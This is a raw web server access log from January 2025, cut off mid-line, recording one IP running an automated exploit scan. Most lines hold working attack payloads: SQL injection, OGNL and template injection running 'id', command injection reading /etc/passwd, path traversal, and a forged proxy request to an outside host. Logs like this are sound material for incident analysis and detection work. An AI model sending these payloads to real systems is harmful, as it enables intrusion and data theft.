38.110.228.166 - - [15/Jan/2025:00:02:28 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:29 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:02:29 -0500] "GET /services HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:30 -0500] "GET /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa")%20and%20extractvalue(1,concat(0x7e,md5(99999999)))%20--%20a HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:30 -0500] "POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce= HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:30 -0500] "GET /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(203292763),5,6,7,8,9%23 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:30 -0500] "GET /jbossmq-httpil/HTTPServerILServlet HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:30 -0500] "GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd%20>../../Test.txt&id=1 HTTP/1.1" 404 1599 38.110.228.166 - - [15/Jan/2025:00:02:30 -0500] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:30 -0500] "POST /actuator/gateway/routes/nbizpvpq HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:30 -0500] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b"freemarker%2etemplate%2eutility%2eExecute"%3fnew%28%29%28"id"%29%7d HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:30 -0500] "POST / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:30 -0500] "GET /certsrv/certrqad.asp HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:30 -0500] "GET /admin/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:30 -0500] "GET /admin/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:30 -0500] "PUT /fileserver/krppth.txt HTTP/1.1" 405 1084 38.110.228.166 - - [15/Jan/2025:00:02:30 -0500] "POST /api/v1/user/login HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:31 -0500] "GET /api/v1/canal/config/1/1 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:31 -0500] "POST /nacos/v1/auth/users?username=gekpzdnseihggpfl&password=gqumyjhdjadtmzrr HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:31 -0500] "GET /manager/radius/server_ping.php?ip=127.0.0.1|echo%20"">../../dcdadxsqhg.php&id=1 HTTP/1.1" 404 1599 38.110.228.166 - - [15/Jan/2025:00:02:31 -0500] "GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:31 -0500] "GET /nacos/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:31 -0500] "POST /druid/indexer/v1/sampler?for=connect HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:31 -0500] "GET /jars HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:31 -0500] "GET /servlet/AxisaxiServlet HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:31 -0500] "GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:31 -0500] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 400 - 38.110.228.166 - - [15/Jan/2025:00:02:31 -0500] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 400 - 38.110.228.166 - - [15/Jan/2025:00:02:31 -0500] "GET /kylin/api/admin/config HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:31 -0500] "GET /nifi-api/flow/current-user HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:31 -0500] "POST /webtools/control/xmlrpc HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:32 -0500] "GET /plug/oem/AspCms_OEMFun.asp HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:32 -0500] "POST /webtools/control/xmlrpc HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:32 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:32 -0500] "GET /pma/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:32 -0500] "GET /plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:32 -0500] "GET /sql.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:32 -0500] "POST /cu.html HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:32 -0500] "POST /druid/indexer/v1/sampler?for=connect HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:32 -0500] "GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:32 -0500] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:32 -0500] "POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:32 -0500] "GET /servlet/AxisServlet HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:33 -0500] "POST /menu/stapp HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:33 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:02:33 -0500] "GET /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 400 - 38.110.228.166 - - [15/Jan/2025:00:02:33 -0500] "GET /spaces/viewdefaultdecorator.action?decoratorName HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:33 -0500] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 1040 38.110.228.166 - - [15/Jan/2025:00:02:33 -0500] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:33 -0500] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:33 -0500] "POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:33 -0500] "GET /s/hkpxrq/_/;/WEB-INF/web.xml HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:33 -0500] "GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:33 -0500] "GET /v1/agent/self HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:33 -0500] "GET /v1/agent/self HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:33 -0500] "GET /includes/mysql2i/mysql2i.func.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "PUT /_users/org.couchdb.user:mzbmfikeltsmyotdnpmgzzraffggiguv HTTP/1.1" 405 1084 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "GET /plugins/weathermap/configs/test.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "GET /www.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "GET /_config HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "GET /actions/seomatic/meta-container/meta-link-container/?uri={{43824*'40760'}} HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "POST /login.cgi HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "GET /services/listServices HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "GET /include/downmix.inc.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "GET /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md52026273347;{/dede:field} HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "GET /plus/guestbook.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "GET /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(854346066)+--+@`'` HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "GET /forum.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "GET /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "GET /plugin.php?id=wechat:wechat&ac=wxregister HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:34 -0500] "GET /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:35 -0500] "GET /viewthread.php?tid=10 HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:35 -0500] "GET //www.example.com HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:35 -0500] "POST /hedwig.cgi HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:35 -0500] "POST /getcfg.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:35 -0500] "GET /config/getuser?index=0 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:35 -0500] "GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:35 -0500] "GET /page/login/login.html HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:35 -0500] "GET /info HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:35 -0500] "GET /v2/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:36 -0500] "GET /user/City_ajax.aspx HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:36 -0500] "GET /druid/index.html HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:36 -0500] "GET /wwwroot.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:36 -0500] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:36 -0500] "POST /getcfg.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:36 -0500] "GET /actions/seomatic/meta-container/all-meta-containers?uri={{43824*'40760'}} HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:36 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:02:36 -0500] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:36 -0500] "GET /services/FreeMarkerService HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:36 -0500] "POST /?q=node&destination=node HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:36 -0500] "POST /node/?_format=hal_json HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "GET /eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005))) HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1" 200 2142 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "GET /user/City_ajax.aspx?CityId=69'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','995189603')),2-- HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "POST /weaver/bsh.servlet.BshServlet HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "GET /iclock/ccccc/windows/win.ini HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "POST /page/exportImport/uploadOperation.jsp HTTP/1.1" 404 1066 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+4141*1658+as+id HTTP/1.1" 404 1028 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "GET /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(42217*40832),null HTTP/1.1" 404 1052 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "POST /cpt/manage/validate.jsp?sourcestring=validateNum HTTP/1.1" 404 1038 38.110.228.166 - - [15/Jan/2025:00:02:37 -0500] "GET /index.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "GET /services/AdminService HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "POST /mobile/browser/WorkflowCenterTreeData.jsp HTTP/1.1" 404 1074 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "POST /?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]=cjnp%25%25yxea HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "POST /delete_cart_goods.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "POST /services%20/WorkflowServiceXml HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "GET /user.php?act=collection_list HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "GET /authenticationserverservlet HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "POST /user.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "GET /user.php?act=login HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "POST /test/test1/123 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "POST /test/test HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "GET /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 - 38.110.228.166 - - [15/Jan/2025:00:02:38 -0500] "PUT /_snapshot/iret HTTP/1.1" 405 1084 38.110.228.166 - - [15/Jan/2025:00:02:39 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:39 -0500] "GET /backup.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:39 -0500] "PUT /v2/keys/joxuxzbzelakfokpiejyuwdeiywtzlsa?dir=true HTTP/1.1" 405 1084 38.110.228.166 - - [15/Jan/2025:00:02:39 -0500] "GET /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)' HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:39 -0500] "GET /owa/auth/x.js HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:39 -0500] "GET /defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp HTTP/1.1" 404 1090 38.110.228.166 - - [15/Jan/2025:00:02:39 -0500] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:39 -0500] "POST /mgmt/tm/util/bash HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:39 -0500] "POST /mgmt/tm/util/bash HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:39 -0500] "POST /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp HTTP/1.1" 404 1100 38.110.228.166 - - [15/Jan/2025:00:02:39 -0500] "GET /axis/services HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:39 -0500] "GET //fckeditor/_samples/default.html HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:39 -0500] "GET /index.php?s=Admin-Data-down&id=../../Conf/config.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:39 -0500] "POST /services%20/WorkflowServiceXml HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "GET /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5(209666291)%29%23 HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "GET /index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5(207317502)%27 HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "POST /user.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "GET /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "GET /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "POST /_search HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "POST /php/change_config.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "GET /back.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "POST /api/graphql HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:40 -0500] "POST 